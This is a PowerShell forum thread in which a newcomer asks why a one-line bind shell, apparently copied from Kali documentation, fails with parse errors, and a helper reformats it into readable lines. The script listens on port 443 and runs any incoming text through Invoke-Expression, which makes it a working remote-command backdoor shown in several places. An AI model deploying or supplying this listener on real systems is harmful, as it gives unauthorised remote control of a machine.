Bind shell command not working

PowerShell Help
1

Hi,

Since I am a newbie with Powershell but tend to master it, forgive my following question.

I get erros when I try to execute the following command, for making a connection with my other computer:

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener(‘0.0.0.0’,443);$listener.start( );$client = $listener.AcceptTcpClient();$stream =$client.GetStream();[byte]$bytes = 0…65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback +‘PS’ + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$tistener.Stop()”

I get the following errors output:

powershell : At line:1 char:69
At line:1 char:1

  • powershell -c "$listener = New-Object System.Net.Sockets.TcpListener( …

  •   + CategoryInfo          : NotSpecified: (At line:1 char:69:String) [], RemoteException
  + FullyQualifiedErrorId : NativeCommandError

  • … Object System.Net.Sockets.TcpListener(‘0.0.0.0’ ,443);.start( ); = .A …

  •                                                              ~

An expression was expected after ‘(’.
At line:1 char:92

  • … ts.TcpListener(‘0.0.0.0’ ,443);.start( ); = .AcceptTcpClient(); =.Get …
  •                                                              ~

An expression was expected after ‘(’.
At line:1 char:107

  • … ‘0.0.0.0’ ,443);.start( ); = .AcceptTcpClient(); =.GetStream();[byte[ …
  •                                                              ~

An expression was expected after ‘(’.
At line:1 char:155

  • … =.GetStream();[byte] = 0…65535|%{0};while(( = .Read(, 0, .Length …
  •                                                              ~

Missing expression after ‘,’.
At line:1 char:156

  • … ream();[byte] = 0…65535|%{0};while(( = .Read(, 0, .Length)) -ne 0 …
  •                                                       ~~~~~~~

Unexpected token ‘.Length’ in expression or statement.
At line:1 char:155

  • … =.GetStream();[byte] = 0…65535|%{0};while(( = .Read(, 0, .Length …
  •                                                              ~

Missing closing ‘)’ in expression.
At line:1 char:165

  • … am();[byte] = 0…65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){ …
  •                                                              ~

Missing statement body in while loop.
At line:1 char:171

  • … yte] = 0…65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){; = (Ne …
  •                                                             ~

Unexpected token ‘)’ in expression or statement.
At line:1 char:236

  • … = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = …
  •                                                              ~

Missing ‘)’ in method call.
At line:1 char:239

  • … New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = (i …
  •                                                              ~

Missing expression after ‘,’ in pipeline element.
Not all parse errors were reported. Correct the reported errors and try again.
+ CategoryInfo : ParserError: (:slight_smile: , ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ExpectedExpression

2

Richard,
Welcome to the forum. :wave:t4:

Since you’re not formatting the code and error messages as code it is very hard to read and the forum software does the rest messing it up. So please go back, edit your existing question again and fix the formatting.

When you post code, sample data, console output or error messages please format it as code using the preformatted text button ( </> ). Simply place your cursor on an empty line, click the button and paste your code.

Thanks in advance

How to format code in PowerShell.org <---- Click :point_up_2:t4: :wink:

Regardless of that - what do you actually want to achieve with your code?

3

Thank you very much Olaf.

I will put the fomratted code below following your suggestions.

I want to achieve a connection with my Linux computer… On my Linux it is not a problem, it is waiting for the connection with netcat or powercat etc.

This code I got from the manual of Kali but apparently it does not work.

4

Here’s the code:

`powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start( );$client = $listener.AcceptTcpClient();$stream =$client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback =(iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '>';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"`
5 
powershell : At line:1 char:69
At line:1 char:1
+ powershell -c "$listener = New-Object System.Net.Sockets.TcpListener( ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (At line:1 char:69:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
 
+ ... Object System.Net.Sockets.TcpListener('0.0.0.0' ,443);.start( ); = .A ...
+                                                                  ~
An expression was expected after '('.
At line:1 char:92
+ ... ts.TcpListener('0.0.0.0' ,443);.start( ); = .AcceptTcpClient(); =.Get ...
+                                                                  ~
An expression was expected after '('.
At line:1 char:107
+ ... '0.0.0.0' ,443);.start( ); = .AcceptTcpClient(); =.GetStream();[byte[ ...
+                                                                  ~
An expression was expected after '('.
At line:1 char:155
+ ...  =.GetStream();[byte[]] = 0..65535|%{0};while((  = .Read(, 0, .Length ...
+                                                                  ~
Missing expression after ','.
At line:1 char:156
+ ... ream();[byte[]] = 0..65535|%{0};while((  = .Read(, 0, .Length)) -ne 0 ...
+                                                           ~~~~~~~
Unexpected token '.Length' in expression or statement.
At line:1 char:155
+ ...  =.GetStream();[byte[]] = 0..65535|%{0};while((  = .Read(, 0, .Length ...
+                                                                  ~
Missing closing ')' in expression.
At line:1 char:165
+ ... am();[byte[]] = 0..65535|%{0};while((  = .Read(, 0, .Length)) -ne 0){ ...
+                                                                  ~
Missing statement body in while loop.
At line:1 char:171
+ ... yte[]] = 0..65535|%{0};while((  = .Read(, 0, .Length)) -ne 0){; = (Ne ...
+                                                                 ~
Unexpected token ')' in expression or statement.
At line:1 char:236
+ ... = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = ...
+                                                                  ~
Missing ')' in method call.
At line:1 char:239
+ ... New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = (i ...
+                                                                  ~
Missing expression after ',' in pipeline element.
Not all parse errors were reported.  Correct the reported errors and try again.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ExpectedExpression
6

Andf above you’'ll find the error output

7

While having no experiences with connecting to linux the code from the command line you provided is hard to read. Broken down to its individual commands, the code looks like this:

$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443)
$listener.start( )
$client = $listener.AcceptTcpClient()
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535 | ForEach-Object{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
    $sendback = (Invoke-Expression $data 2>&1 | Out-String )
    $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '>'
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()
$listener.Stop()

This way you could run the code piece by piece. It might be easier to debug this way. While I have actually no idea what this code should do some lines look weird.

You may ask this question in a Kali related forum as well and ask if someone already was able to successfully establish a connection this way. :wink: